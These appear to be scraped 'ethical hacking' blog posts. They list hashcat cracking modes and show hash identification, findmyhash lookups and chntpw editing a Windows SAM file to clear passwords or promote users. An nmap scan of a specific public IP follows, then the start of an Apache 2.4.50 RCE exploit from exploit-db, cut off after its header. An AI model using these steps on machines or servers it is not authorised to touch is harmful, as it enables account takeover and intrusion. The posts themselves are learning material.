VeraCrypt SHA256 + XTS 1536 bit + boot-mode | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13721 | VeraCrypt SHA512 + XTS 512 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13722 | VeraCrypt SHA512 + XTS 1024 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13723 | VeraCrypt SHA512 + XTS 1536 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13771 | VeraCrypt Streebog-512 + XTS 512 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13772 | VeraCrypt Streebog-512 + XTS 1024 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13773 | VeraCrypt Streebog-512 + XTS 1536 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13731 | VeraCrypt Whirlpool + XTS 512 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13732 | VeraCrypt Whirlpool + XTS 1024 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13733 | VeraCrypt Whirlpool + XTS 1536 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 16700 | FileVault 2 | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 20011 | DiskCryptor SHA512 + XTS 512 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 20012 | DiskCryptor SHA512 + XTS 1024 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 20013 | DiskCryptor SHA512 + XTS 1536 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 22100 | BitLocker | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 12900 | Android FDE <span class="o">(</span>Samsung DEK<span class="o">)</span> | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 8800 | Android FDE &lt;<span class="o">=</span> 4.3 | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 18300 | Apple File System <span class="o">(</span>APFS<span class="o">)</span> | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 6211 | TrueCrypt RIPEMD160 + XTS 512 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 6212 | TrueCrypt RIPEMD160 + XTS 1024 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 6213 | TrueCrypt RIPEMD160 + XTS 1536 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 6221 | TrueCrypt SHA512 + XTS 512 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 6222 | TrueCrypt SHA512 + XTS 1024 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 6223 | TrueCrypt SHA512 + XTS 1536 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 6231 | TrueCrypt Whirlpool + XTS 512 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 6232 | TrueCrypt Whirlpool + XTS 1024 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 6233 | TrueCrypt Whirlpool + XTS 1536 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 10400 | PDF 1.1 - 1.3 <span class="o">(</span>Acrobat 2 - 4<span class="o">)</span> | Documents 10410 | PDF 1.1 - 1.3 <span class="o">(</span>Acrobat 2 - 4<span class="o">)</span>, collider <span class="c">#1 | Documents</span> 10420 | PDF 1.1 - 1.3 <span class="o">(</span>Acrobat 2 - 4<span class="o">)</span>, collider <span class="c">#2 | Documents</span> 10500 | PDF 1.4 - 1.6 <span class="o">(</span>Acrobat 5 - 8<span class="o">)</span> | Documents 10600 | PDF 1.7 Level 3 <span class="o">(</span>Acrobat 9<span class="o">)</span> | Documents 10700 | PDF 1.7 Level 8 <span class="o">(</span>Acrobat 10 - 11<span class="o">)</span> | Documents 9400 | MS Office 2007 | Documents 9500 | MS Office 2010 | Documents 9600 | MS Office 2013 | Documents 9700 | MS Office &lt;<span class="o">=</span> 2003 <span class="nv">$0</span>/<span class="nv">$1</span>, MD5 + RC4 | Documents 9710 | MS Office &lt;<span class="o">=</span> 2003 <span class="nv">$0</span>/<span class="nv">$1</span>, MD5 + RC4, collider <span class="c">#1 | Documents</span> 9720 | MS Office &lt;<span class="o">=</span> 2003 <span class="nv">$0</span>/<span class="nv">$1</span>, MD5 + RC4, collider <span class="c">#2 | Documents</span> 9800 | MS Office &lt;<span class="o">=</span> 2003 <span class="nv">$3</span>/<span class="nv">$4</span>, SHA1 + RC4 | Documents 9810 | MS Office &lt;<span class="o">=</span> 2003 <span class="nv">$3</span>, SHA1 + RC4, collider <span class="c">#1 | Documents</span> 9820 | MS Office &lt;<span class="o">=</span> 2003 <span class="nv">$3</span>, SHA1 + RC4, collider <span class="c">#2 | Documents</span> 18400 | Open Document Format <span class="o">(</span>ODF<span class="o">)</span> 1.2 <span class="o">(</span>SHA-256, AES<span class="o">)</span> | Documents 18600 | Open Document Format <span class="o">(</span>ODF<span class="o">)</span> 1.1 <span class="o">(</span>SHA-1, Blowfish<span class="o">)</span> | Documents 16200 | Apple Secure Notes | Documents 15500 | JKS Java Key Store Private Keys <span class="o">(</span>SHA1<span class="o">)</span> | Password Managers 6600 | 1Password, agilekeychain | Password Managers 8200 | 1Password, cloudkeychain | Password Managers 9000 | Password Safe v2 | Password Managers 5200 | Password Safe v3 | Password Managers 6800 | LastPass + LastPass sniffed | Password Managers 13400 | KeePass 1 <span class="o">(</span>AES/Twofish<span class="o">)</span> and KeePass 2 <span class="o">(</span>AES<span class="o">)</span> | Password Managers 11300 | Bitcoin/Litecoin wallet.dat | Password Managers 16600 | Electrum Wallet <span class="o">(</span>Salt-Type 1-3<span class="o">)</span> | Password Managers 21700 | Electrum Wallet <span class="o">(</span>Salt-Type 4<span class="o">)</span> | Password Managers 21800 | Electrum Wallet <span class="o">(</span>Salt-Type 5<span class="o">)</span> | Password Managers 12700 | Blockchain, My Wallet | Password Managers 15200 | Blockchain, My Wallet, V2 | Password Managers 18800 | Blockchain, My Wallet, Second Password <span class="o">(</span>SHA256<span class="o">)</span> | Password Managers 23100 | Apple Keychain | Password Managers 16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256 | Password Managers 15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256 | Password Managers 15700 | Ethereum Wallet, SCRYPT | Password Managers 22500 | MultiBit Classic .key <span class="o">(</span>MD5<span class="o">)</span> | Password Managers 22700 | MultiBit HD <span class="o">(</span>scrypt<span class="o">)</span> | Password Managers 11600 | 7-Zip | Archives 12500 | RAR3-hp | Archives 13000 | RAR5 | Archives 17200 | PKZIP <span class="o">(</span>Compressed<span class="o">)</span> | Archives 17220 | PKZIP <span class="o">(</span>Compressed Multi-File<span class="o">)</span> | Archives 17225 | PKZIP <span class="o">(</span>Mixed Multi-File<span class="o">)</span> | Archives 17230 | PKZIP <span class="o">(</span>Mixed Multi-File Checksum-Only<span class="o">)</span> | Archives 17210 | PKZIP <span class="o">(</span>Uncompressed<span class="o">)</span> | Archives 20500 | PKZIP Master Key | Archives 20510 | PKZIP Master Key <span class="o">(</span>6 byte optimization<span class="o">)</span> | Archives 14700 | iTunes backup &lt; 10.0 | Archives 14800 | iTunes backup <span class="o">&gt;=</span> 10.0 | Archives 23001 | SecureZIP AES-128 | Archives 23002 | SecureZIP AES-192 | Archives 23003 | SecureZIP AES-256 | Archives 13600 | WinZip | Archives 18900 | Android Backup | Archives 13200 | AxCrypt | Archives 13300 | AxCrypt <span class="k">in</span><span class="nt">-memory</span> SHA1 | Archives 8400 | WBB3 <span class="o">(</span>Woltlab Burning Board<span class="o">)</span> | Forums, CMS, E-Commerce 2611 | vBulletin &lt; v3.8.5 | Forums, CMS, E-Commerce 2711 | vBulletin <span class="o">&gt;=</span> v3.8.5 | Forums, CMS, E-Commerce 2612 | PHPS | Forums, CMS, E-Commerce 121 | SMF <span class="o">(</span>Simple Machines Forum<span class="o">)</span> <span class="o">&gt;</span> v1.1 | Forums, CMS, E-Commerce 3711 | MediaWiki B <span class="nb">type</span> | Forums, CMS, E-Commerce 4521 | Redmine | Forums, CMS, E-Commerce 11 | Joomla &lt; 2.5.18 | Forums, CMS, E-Commerce 13900 | OpenCart | Forums, CMS, E-Commerce 11000 | PrestaShop | Forums, CMS, E-Commerce 16000 | Tripcode | Forums, CMS, E-Commerce 7900 | Drupal7 | Forums, CMS, E-Commerce 21 | osCommerce, xt:Commerce | Forums, CMS, E-Commerce 4522 | PunBB | Forums, CMS, E-Commerce 2811 | MyBB 1.2+, IPB2+ <span class="o">(</span>Invision Power Board<span class="o">)</span> | Forums, CMS, E-Commerce 18100 | TOTP <span class="o">(</span>HMAC-SHA1<span class="o">)</span> | One-Time Passwords 2000 | STDOUT | Plaintext 99999 | Plaintext | Plaintext 21600 | Web2py pbkdf2-sha512 | Framework 10000 | Django <span class="o">(</span>PBKDF2-SHA256<span class="o">)</span> | Framework 124 | Django <span class="o">(</span>SHA-1<span class="o">)</span> | Framework - <span class="o">[</span> Brain Client Features <span class="o">]</span> - <span class="c"># | Features</span> <span class="o">===</span>+<span class="o">========</span> 1 | Send hashed passwords 2 | Send attack positions 3 | Send hashed passwords and attack positions - <span class="o">[</span> Outfile Formats <span class="o">]</span> - <span class="c"># | Format</span> <span class="o">===</span>+<span class="o">========</span> 1 | <span class="nb">hash</span><span class="o">[</span>:salt] 2 | plain 3 | hex_plain 4 | crack_pos 5 | timestamp absolute 6 | timestamp relative - <span class="o">[</span> Rule Debugging Modes <span class="o">]</span> - <span class="c"># | Format</span> <span class="o">===</span>+<span class="o">========</span> 1 | Finding-Rule 2 | Original-Word 3 | Original-Word:Finding-Rule 4 | Original-Word:Finding-Rule:Processed-Word - <span class="o">[</span> Attack Modes <span class="o">]</span> - <span class="c"># | Mode</span> <span class="o">===</span>+<span class="o">======</span> 0 | Straight 1 | Combination 3 | Brute-force 6 | Hybrid Wordlist + Mask 7 | Hybrid Mask + Wordlist - <span class="o">[</span> Built-in Charsets <span class="o">]</span> - ? | Charset <span class="o">===</span>+<span class="o">=========</span> l | abcdefghijklmnopqrstuvwxyz u | ABCDEFGHIJKLMNOPQRSTUVWXYZ d | 0123456789 h | 0123456789abcdef H | 0123456789ABCDEF s | <span class="o">!</span><span class="s2">"#</span><span class="nv">$%</span><span class="s2">&amp;'()*+,-./:;&lt;=&gt;?@[</span><span class="se">\]</span><span class="s2">^_</span><span class="sb">`</span><span class="o">{</span>|<span class="o">}</span>~ a | ?l?u?d?s b | 0x00 - 0xff - <span class="o">[</span> OpenCL Device Types <span class="o">]</span> - <span class="c"># | Device Type</span> <span class="o">===</span>+<span class="o">=============</span> 1 | CPU 2 | GPU 3 | FPGA, DSP, Co-Processor - <span class="o">[</span> Workload Profiles <span class="o">]</span> - <span class="c"># | Performance | Runtime | Power Consumption | Desktop Impact</span> <span class="o">===</span>+<span class="o">=============</span>+<span class="o">=========</span>+<span class="o">===================</span>+<span class="o">=================</span> 1 | Low | 2 ms | Low | Minimal 2 | Default | 12 ms | Economic | Noticeable 3 | High | 96 ms | High | Unresponsive 4 | Nightmare | 480 ms | Insane | Headless - <span class="o">[</span> Basic Examples <span class="o">]</span> - Attack- | Hash- | Mode | Type | Example <span class="nb">command</span> <span class="o">==================</span>+<span class="o">=======</span>+<span class="o">==================================================================</span> Wordlist | <span class="nv">$P$ </span> | hashcat <span class="nt">-a</span> 0 <span class="nt">-m</span> 400 example400.hash example.dict Wordlist + Rules | MD5 | hashcat <span class="nt">-a</span> 0 <span class="nt">-m</span> 0 example0.hash example.dict <span class="nt">-r</span> rules/best64.rule Brute-Force | MD5 | hashcat <span class="nt">-a</span> 3 <span class="nt">-m</span> 0 example0.hash ?a?a?a?a?a?a Combinator | MD5 | hashcat <span class="nt">-a</span> 1 <span class="nt">-m</span> 0 example0.hash example.dict example.dict If you still have no idea what just happened, try the following pages: <span class="k">*</span> https://hashcat.net/wiki/#howtos_videos_papers_articles_etc_in_the_wild <span class="k">*</span> https://hashcat.net/faq/ </code></pre> </div> <h1> let's go to use Hash-identifier </h1> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>hash-identifier </code></pre> </div> <p>Output<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> <span class="c">#########################################################################</span> <span class="c"># __ __ __ ______ _____ #</span> <span class="c"># /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #</span> <span class="c"># \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #</span> <span class="c"># \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #</span> <span class="c"># \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #</span> <span class="c"># \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #</span> <span class="c"># \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #</span> <span class="c"># By Zion3R #</span> <span class="c"># www.Blackploit.com #</span> <span class="c"># Root@Blackploit.com #</span> <span class="c">#########################################################################</span> <span class="nt">--------------------------------------------------</span> HASH: </code></pre> </div> <p>let's generate a hash on the MD5 site and paste it into the hash-identifier terminal<br> <b><a href="https://www.md5hashgenerator.com/" rel="noopener noreferrer">https://www.md5hashgenerator.com/</a></b></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8zev16mwaskdx72c7id2.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8zev16mwaskdx72c7id2.png" alt=" " width="631" height="498"></a><br> Msg : bonjour samuel<br> MD5: 3615cdf80ebacda55dd2aa30dc4bebd0<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> <span class="c">#########################################################################</span> <span class="c"># __ __ __ ______ _____ #</span> <span class="c"># /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #</span> <span class="c"># \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #</span> <span class="c"># \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #</span> <span class="c"># \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #</span> <span class="c"># \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #</span> <span class="c"># \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #</span> <span class="c"># By Zion3R #</span> <span class="c"># www.Blackploit.com #</span> <span class="c"># Root@Blackploit.com #</span> <span class="c">#########################################################################</span> <span class="nt">--------------------------------------------------</span> HASH: 3615cdf80ebacda55dd2aa30dc4bebd0 Possible Hashs: <span class="o">[</span>+] MD5 <span class="o">[</span>+] Domain Cached Credentials - MD4<span class="o">(</span>MD4<span class="o">((</span><span class="nv">$pass</span><span class="o">))</span>.<span class="o">(</span>strtolower<span class="o">(</span><span class="nv">$username</span><span class="o">)))</span> Least Possible Hashs: <span class="o">[</span>+] RAdmin v2.x <span class="o">[</span>+] NTLM <span class="o">[</span>+] MD4 <span class="o">[</span>+] MD2 <span class="o">[</span>+] MD5<span class="o">(</span>HMAC<span class="o">)</span> <span class="o">[</span>+] MD4<span class="o">(</span>HMAC<span class="o">)</span> <span class="o">[</span>+] MD2<span class="o">(</span>HMAC<span class="o">)</span> <span class="o">[</span>+] MD5<span class="o">(</span>HMAC<span class="o">(</span>Wordpress<span class="o">))</span> <span class="o">[</span>+] Haval-128 <span class="o">[</span>+] Haval-128<span class="o">(</span>HMAC<span class="o">)</span> <span class="o">[</span>+] RipeMD-128 <span class="o">[</span>+] RipeMD-128<span class="o">(</span>HMAC<span class="o">)</span> <span class="o">[</span>+] SNEFRU-128 <span class="o">[</span>+] SNEFRU-128<span class="o">(</span>HMAC<span class="o">)</span> <span class="o">[</span>+] Tiger-128 <span class="o">[</span>+] Tiger-128<span class="o">(</span>HMAC<span class="o">)</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">)</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span><span class="o">)</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">)</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span>.<span class="nv">$username</span><span class="o">)</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$salt</span>.md5<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$salt</span>.md5<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$salt</span>.md5<span class="o">(</span><span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">))</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$salt</span>.md5<span class="o">(</span><span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">))</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$salt</span>.md5<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span><span class="o">))</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$salt</span>.md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.<span class="nv">$salt</span><span class="o">))</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$username</span>.0.<span class="nv">$pass</span><span class="o">)</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$username</span>.LF.<span class="nv">$pass</span><span class="o">)</span> <span class="o">[</span>+] md5<span class="o">(</span><span class="nv">$username</span>.md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.<span class="nv">$salt</span><span class="o">)</span> <span class="o">[</span>+] md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> <span class="o">[</span>+] md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.<span class="nv">$salt</span><span class="o">)</span> <span class="o">[</span>+] md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.md5<span class="o">(</span><span class="nv">$salt</span><span class="o">))</span> <span class="o">[</span>+] md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$salt</span><span class="o">)</span>.<span class="nv">$pass</span><span class="o">)</span> <span class="o">[</span>+] md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$salt</span><span class="o">)</span>.md5<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> <span class="o">[</span>+] md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$username</span>.<span class="nv">$pass</span><span class="o">)</span>.<span class="nv">$salt</span><span class="o">)</span> <span class="o">[</span>+] md5<span class="o">(</span>md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)))</span> <span class="o">[</span>+] md5<span class="o">(</span>md5<span class="o">(</span>md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">))))</span> <span class="o">[</span>+] md5<span class="o">(</span>md5<span class="o">(</span>md5<span class="o">(</span>md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)))))</span> <span class="o">[</span>+] md5<span class="o">(</span>sha1<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> <span class="o">[</span>+] md5<span class="o">(</span>sha1<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)))</span> <span class="o">[</span>+] md5<span class="o">(</span>sha1<span class="o">(</span>md5<span class="o">(</span>sha1<span class="o">(</span><span class="nv">$pass</span><span class="o">))))</span> <span class="o">[</span>+] md5<span class="o">(</span>strtoupper<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)))</span> <span class="nt">--------------------------------------------------</span> </code></pre> </div> <h2> we are trying to crack the hash in the local database using the findmyhash tool </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>findmyhash md5 <span class="nt">-h</span> 3615cdf80ebacda55dd2aa30dc4bebd0 </code></pre> </div> <h1> Change password (chntpw) </h1> <p>Best tool to crack password easily by knowing SAM files<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>chntpw </code></pre> </div> <p>OUTPUT<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>chntpw version 1.00 140201, (c) Petter N Hagen chntpw: change password of a user in a Windows SAM file, or invoke registry editor. Should handle both 32 and 64 bit windows and all version from NT3.x to Win8.1 chntpw [OPTIONS] &lt;samfile&gt; [systemfile] [securityfile] [otherreghive] [...] -h This message -u &lt;user&gt; Username or RID (0x3e9 for example) to interactively edit -l list all users in SAM file and exit -i Interactive Menu system -e Registry editor. Now with full write support! -d Enter buffer debugger instead (hex editor), -v Be a little more verbose (for debuging) -L For scripts, write names of changed files to /tmp/changed -N No allocation mode. Only same length overwrites possible (very safe mode) -E No expand mode, do not expand hive file (safe mode) Usernames can be given as name or RID (in hex with 0x first) See readme file on how to get to the registry files, and what they are. Source/binary freely distributable under GPL v2 license. See README for details. NOTE: This program is somewhat hackish! You are on your own! </code></pre> </div> <h3> Let's go to the windows&gt;system32 folder </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cd</span> /media/samglish/D8CC0490CC046AD8/Windows/System32/config </code></pre> </div> <p>after<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>chntpw <span class="nt">-i</span> SAM </code></pre> </div> <p>OUTPUT<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>chntpw version 1.00 140201, (c) Petter N Hagen Hive &lt;SAM&gt; name (from header): &lt;\SystemRoot\System32\Config\SAM&gt; ROOT KEY at offset: 0x001020 * Subkey indexing type is: 686c &lt;lh&gt; File size 65536 [10000] bytes, containing 8 pages (+ 1 headerpage) Used for data: 315/32832 blocks/bytes, unused: 25/16064 blocks/bytes. &lt;&gt;========&lt;&gt; chntpw Main Interactive Menu &lt;&gt;========&lt;&gt; Loaded hives: &lt;SAM&gt; 1 - Edit user data and passwords 2 - List groups - - - 9 - Registry editor, now with full write support! q - Quit (you will be asked if there is something to save) What to do? [1] -&gt; </code></pre> </div> <p>Press 1<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>===== chntpw Edit User Info &amp; Passwords ==== | RID -|---------- Username ------------| Admin? |- Lock? --| | 01f4 | Administrateur | ADMIN | dis/lock | | 01f7 | DefaultAccount | | dis/lock | | 03e9 | Glish | ADMIN | | | 01f5 | Invit� | | | | 01f8 | WDAGUtilityAccount | | dis/lock | Please enter user number (RID) or 0 to exit: [3e9] </code></pre> </div> <p>Copy RID 03e9 and paste in terminal<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>================= USER EDIT ==================== RID : 1001 [03e9] Username: Glish fullname: comment : homedir : 00000220 = Administrateurs (which has 2 members) Account bits: 0x0214 = [ ] Disabled | [ ] Homedir req. | [X] Passwd not req. | [ ] Temp. duplicate | [X] Normal account | [ ] NMS account | [ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act | [X] Pwd don't expir | [ ] Auto lockout | [ ] (unknown 0x08) | [ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ] (unknown 0x40) | Failed login count: 0, while max tries is: 0 Total login count: 461 - - - - User Edit Menu: 1 - Clear (blank) user password (2 - Unlock and enable user account) [seems unlocked already] 3 - Promote user (make user an administrator) 4 - Add user to a group 5 - Remove user from a group q - Quit editing user, back to user select Select: [q] &gt; </code></pre> </div> ethicalhacking password cybersecurity security Server side (vulnerability scanning) BEIDI DINA SAMUEL Fri, 05 Jul 2024 00:02:53 +0000 https://forem.com/samglish/server-side-vulnerability-scanning-1hf9 https://forem.com/samglish/server-side-vulnerability-scanning-1hf9 <p><strong>Ethical Hacking</strong><br> Visit the github project: <a href="https://github.com/samglish/ServerSide" rel="noopener noreferrer">https://github.com/samglish/ServerSide</a> </p> <h2> Tools </h2> <ul> <li>Skipfish</li> <li>Owasp Disrbuster</li> <li>Webslayer</li> <li>Nmap</li> <li>Nessus</li> </ul> <h3> The first scanner we will use </h3> <p>Nmap<br> </p> <br> to see the services running, launch nmap.<br> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-sV</span> 145.14.145.161 </code></pre> </div> <p>output<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Starting Nmap 7.91 ( https://nmap.org ) at 2024-07-04 22:50 WAT Nmap scan report for 145.14.145.161 Host is up (0.28s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp? 80/tcp open http awex 443/tcp open ssl/https awex 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : </code></pre> </div> <p>You can retrieve the services that are running or go directly to retrieve them from the database.<br> <a href="https://www.exploit-db.com/" rel="noopener noreferrer"></a><a href="https://www.exploit-db.com/" rel="noopener noreferrer">https://www.exploit-db.com/</a><br> <br><br> Service:<code>http</code></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1ejrwm59s8smoj4sgqqs.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1ejrwm59s8smoj4sgqqs.png" alt=" " width="800" height="326"></a></p> <ul> <li>Download the python file exploit</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi87frcny6d1ljklk63ae.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi87frcny6d1ljklk63ae.png" alt=" " width="800" height="327"></a></p> <ul> <li>Look the python file </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) # Date: 11/11/2021 # Exploit Author: Valentin Lobstein # Vendor Homepage: https://apache.org/ # Version: Apache 2.4.49/2.4.50 (CGI enabled) # Tested on: Debian GNU/Linux # CVE : CVE-2021-41773 / CVE-2021-42013 # Credits : Lucas Schnell </span> <span class="c1">#!/usr/bin/env python3 #coding: utf-8 </span> <span class="kn">import</span> <span class="n">os</span> <span class="kn">import</span> <span class="n">re</span> <span class="kn">import</span> <span class="n">sys</span> <span class="kn">import</span> <span class="n">time</span> <span class="kn">import</span> <span class="n">requests</span> <span class="kn">from</span> <span class="n">colorama</span> <span class="kn">import</span> <span class="n">Fore</span><span class="p">,</span><span class="n">Style</span> <span class="n">header</span> <span class="o">=</span> <span class="sh">'''</span><span class="se">\033</span><span class="s">[1;91m ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████ ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀ ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███ ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄ ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒ ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░ ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░ </span><span class="sh">'''</span> <span class="o">+</span> <span class="n">Style</span><span class="p">.</span><span 